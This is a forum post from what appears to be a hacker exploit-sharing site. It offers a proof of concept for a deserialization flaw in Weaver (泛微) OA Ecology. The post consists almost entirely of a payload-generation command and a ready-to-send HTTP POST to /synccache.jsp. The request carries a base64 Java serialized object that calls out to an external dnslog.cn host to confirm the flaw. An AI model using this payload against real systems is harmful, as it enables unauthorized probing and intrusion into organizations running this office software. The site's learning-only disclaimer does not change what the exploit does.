[ 主页 ]  [ 隐私策略 ]  [ 0day ]  [ 业务合作 ]  [ 获得金币 ]  [ 项目开发 ]  [ 渗透 ]  [ 逆向破解 ]  [ faq ]  [ 联系我们 ]  [ 远控木马 ]  [ 合作方式 ]    用户: 39601     
0day Today Exploit DB Official RSS Channel
Tor
Telegram联系我们
Shacker

泛微OA Ecology-泛微OA反序列化漏洞

Shacker

Shacker已验证会员

黑客倉庫站長

贡献: 21%
Python:
代码: 
## 漏洞概述

暂无详情

## 影响范围

```http
未知
```

## 漏洞复现

生成反序列化 payload

```bash
java -jar xx | base64
```

```http
POST /synccache.jsp HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded

data=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVz
aG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFz
aENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgAD
TAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAEHg4Yzgy
dy5kbnNsb2cuY250AABxAH4ABXQABGh0dHBweHQAF2h0dHA6Ly94OGM4MncuZG5zbG9nLmNueA==
```
 
Shacker
POC  泛微OA `weaver.common.Ctrl` 存在任意文件上传漏洞
Shacker
兰陵OA  EKP 后台SQL注入漏洞 CNVD-2021-01363
点击展开...
好评 0 否决票
您必须登录或注册才可回复。

暗网黑客论坛网站:声明,本网站的教程、文章、工具和其他相关内容仅供学习和研究使用,旨在提高公众的网络安全意识和防护能力。
我们强烈反对任何形式的非法活动,禁止未经授权的入侵、攻击、破坏他人的网络系统等行为。
Copyright © 2013-2025 HACK 您可以联系我们的Telegram进行业务合作: @Hack7er1949  网站地图Sitemap
后退
顶部